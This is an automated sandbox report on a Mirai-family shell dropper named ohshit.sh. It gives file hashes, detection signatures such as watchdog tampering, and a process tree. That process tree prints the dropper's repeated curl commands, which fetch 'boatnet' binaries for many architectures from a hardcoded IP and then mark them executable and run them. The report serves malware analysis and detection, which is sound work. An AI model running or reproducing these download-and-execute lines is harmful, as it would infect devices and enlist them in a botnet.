Analysis

  • max time kernel
    61s
  • max time network
    67s
  • platform
    debian-12_mipsel
  • resource
    debian12-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian12-mipsel-20240729-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem
  • submitted
    31-08-2024 21:05

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    fefdf2b7ece4d55bd47778b420f84011

  • SHA1

    2823096e0538910f9b57ff9bae007ec655520fc3

  • SHA256

    3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

  • SHA512

    b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21

Score
10/10

Malware Config

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 1 TTPs 16 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:742
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:749
    • /usr/bin/cat
      cat boatnet.x86
      2⤵
        PID:788
      • /usr/bin/chmod
        chmod +x boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-timedated.service-9uBzHH WTF
        2⤵
          PID:789
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:790
        • /usr/bin/curl
          curl -O http://94.156.71.225/hiddenbin/boatnet.mips
          2⤵
          • Writes file to tmp directory
          PID:793
        • /usr/bin/cat
          cat boatnet.mips
          2⤵
            PID:796
          • /usr/bin/chmod
            chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
            2⤵
              PID:797
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              PID:798
            • /usr/bin/curl
              curl -O http://94.156.71.225/hiddenbin/boatnet.arc
              2⤵
              • Writes file to tmp directory
              PID:801
            • /usr/bin/cat
              cat boatnet.arc
              2⤵
                PID:802
              • /usr/bin/chmod
                chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                2⤵
                  PID:803
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  PID:804
                • /usr/bin/curl
                  curl -O http://94.156.71.225/hiddenbin/boatnet.i468
                  2⤵
                  • Writes file to tmp directory
                  PID:807
                • /usr/bin/cat
                  cat boatnet.i468
                  2⤵
                    PID:808
                  • /usr/bin/chmod
                    chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                    2⤵
                      PID:809
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      PID:810
                    • /usr/bin/curl
                      curl -O http://94.156.71.225/hiddenbin/boatnet.i686
                      2⤵
                      • Writes file to tmp directory
                      PID:812
                    • /usr/bin/cat
                      cat boatnet.i686
                      2⤵
                        PID:813
                      • /usr/bin/chmod
                        chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                        2⤵
                          PID:814
                        • /tmp/WTF
                          ./WTF
                          2⤵
                          • Executes dropped EXE
                          PID:815
                        • /usr/bin/curl
                          curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64
                          2⤵
                          • Writes file to tmp directory
                          PID:817
                        • /usr/bin/cat
                          cat boatnet.x86_64
                          2⤵
                            PID:818
                          • /usr/bin/chmod
                            chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                            2⤵
                              PID:819
                            • /tmp/WTF
                              ./WTF
                              2⤵
                              • Executes dropped EXE
                              PID:820
                            • /usr/bin/curl
                              curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl
                              2⤵
                              • Writes file to tmp directory
                              PID:823
                            • /usr/bin/cat
                              cat boatnet.mpsl
                              2⤵
                                PID:824
                              • /usr/bin/chmod
                                chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                2⤵
                                  PID:825
                                • /tmp/WTF
                                  ./WTF
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies Watchdog functionality
                                  • Writes file to system bin folder
                                  • Reads runtime system information
                                  PID:826
                                • /usr/bin/curl
                                  curl -O http://94.156.71.225/hiddenbin/boatnet.arm
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:832
                                • /usr/bin/chmod
                                  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                  2⤵
                                    PID:835
                                  • /tmp/WTF
                                    ./WTF
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies Watchdog functionality
                                    • Writes file to system bin folder
                                    • Reads runtime system information
                                    PID:836
                                  • /usr/bin/curl
                                    curl -O http://94.156.71.225/hiddenbin/boatnet.arm5
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:842
                                  • /usr/bin/chmod
                                    chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                    2⤵
                                      PID:845
                                    • /tmp/WTF
                                      ./WTF
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies Watchdog functionality
                                      • Writes file to system bin folder
                                      • Reads runtime system information
                                      PID:846
                                    • /usr/bin/curl
                                      curl -O http://94.156.71.225/hiddenbin/boatnet.arm6
                                      2⤵
                                      • Writes file to tmp directory
                                      PID:852
                                    • /usr/bin/chmod
                                      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                      2⤵
                                        PID:854
                                      • /tmp/WTF
                                        ./WTF
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies Watchdog functionality
                                        • Writes file to system bin folder
                                        • Reads runtime system information
                                        PID:855
                                      • /usr/bin/curl
                                        curl -O http://94.156.71.225/hiddenbin/boatnet.arm7
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:861
                                      • /usr/bin/chmod
                                        chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                        2⤵
                                          PID:864
                                        • /tmp/WTF
                                          ./WTF
                                          2⤵
                                          • Executes dropped EXE
                                          • Modifies Watchdog functionality
                                          • Writes file to system bin folder
                                          • Reads runtime system information
                                          PID:865
                                        • /usr/bin/curl
                                          curl -O http://94.156.71.225/hiddenbin/boatnet.ppc
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:871
                                        • /usr/bin/chmod
                                          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                          2⤵
                                            PID:873
                                          • /tmp/WTF
                                            ./WTF
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies Watchdog functionality
                                            • Writes file to system bin folder
                                            • Reads runtime system information
                                            PID:874
                                          • /usr/bin/curl
                                            curl -O http://94.156.71.225/hiddenbin/boatnet.spc
                                            2⤵
                                            • Writes file to tmp directory
                                            PID:881
                                          • /usr/bin/chmod
                                            chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                            2⤵
                                              PID:883
                                            • /tmp/WTF
                                              ./WTF
                                              2⤵
                                              • Executes dropped EXE
                                              • Modifies Watchdog functionality
                                              • Writes file to system bin folder
                                              • Reads runtime system information
                                              PID:884
                                            • /usr/bin/curl
                                              curl -O http://94.156.71.225/hiddenbin/boatnet.m68k
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:891
                                            • /usr/bin/chmod
                                              chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
                                              2⤵
                                                PID:894
                                              • /tmp/WTF
                                                ./WTF
                                                2⤵
                                                • Executes dropped EXE
                                                • Modifies Watchdog functionality
                                                • Writes file to system bin folder
                                                • Reads runtime system information
                                                PID:895

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • /tmp/boatnet.x86

                                              Filesize

                                              36KB

                                              MD5

                                              ba2cb5b8715ba94c39e24e75a34d0ea0

                                              SHA1

                                              7182bf3b0e14e5224e741c15174c6e93f00df444

                                              SHA256

                                              01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33

                                              SHA512

                                              0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d